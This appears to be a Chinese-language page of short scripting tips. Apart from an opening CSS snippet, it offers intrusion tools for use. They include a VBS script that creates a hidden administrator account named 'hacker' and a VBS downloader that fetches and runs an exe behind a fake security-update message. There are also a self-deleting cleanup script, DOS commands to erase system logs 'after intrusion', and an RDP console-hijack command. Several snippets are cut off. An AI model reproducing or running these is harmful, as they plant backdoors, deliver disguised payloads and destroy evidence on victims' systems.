【Html】Html 在网页,页面中背景图片居中显示

Html 在网页、页面中背景图片居中显示: <STYLE TYPE="text/css">   <!--     BODY {background-image: URL("image/index.jpg");     background-position: center;     background-repeat: no-repeat;     background-attachment: fixed;}   --> </STYLE> 简单的css代码,不解释了。。。     Html 在网页、页面中背景图片居中显示

【VBS】VBS 不需要Net.exe添加系统管理账号

VBS 不需要 net.exe 添加系统管理账号: 添加账号:Hacker,密码:123456。 set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","hacker") od.SetPassword "123456" od.SetInfo Set of=GetObject(os&"/hacker",user) oe.add os&"/hacker" 仅仅依赖于系统中的wscript.e

【VBS】vbs下载指定url地址exe文件并运行命令

VBS 下载指定URL地址EXE文件并运行命令: set xPost = createObject("Microsoft.XMLHTTP") xPost.Open "GET","http://down.360safe.com/setup.exe",0 xPost.Send() Set sGet = createObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "rose.exe" Set ws = CreateObject("Wscript.Shell") ws.run "rose.exe" msgbox "360安全卫士更新完毕!",vbyes,

【VBS】VBS 判断文件是否存在并进行删除命令

VBS 判断文件是否存在并进行删除命令: Set fso = CreateObject("Scripting.FileSystemObject") WScript.Sleep 1000 fso.DeleteFile(WScript.ScriptName) If fso.FileExists("c:\selfkill.exe") Then fso.DeleteFile("c:\selfkill.exe") 调用FSO组件判断、删除指定文件,很简单的,不解释。     VBS 判断文件是否存在并进行删除命

【Dos】使用Cmd,Dos局域网中根据IP查主机名

使用 Cmd、Dos 在局域网中根据IP查主机名: nbtstat -a ip 更多: Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP). NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]         [-r] [-R] [-RR] [-s] [-S] [interval] ]   -a   (adapter status) Lists the remote machine's name table given its

【Dos】使用 Cmd、Dos 清理入侵后的系统日志

使用 Cmd、Dos 清理入侵后的系统日志: del C:\winnt\system32\logfiles\*.* del C:\winnt\system32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 基础的东西,不解释了。。     使用 Cmd、Dos 清理入侵后的系统日志,使用 C

【Dos】使用Cmd,Dos 连接超过3人的3389命令

使用 Cmd、Dos 连接超过3人的3389命令详解: mstsc /console /v IP:Port 其实就是控制台模式连接,抢占系统会话。 ------------------------------------------------------------------------------------------- 远程桌面连接用法: MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]   [/w:<width> /h:<height>] | /Edit"ConnectionFile" |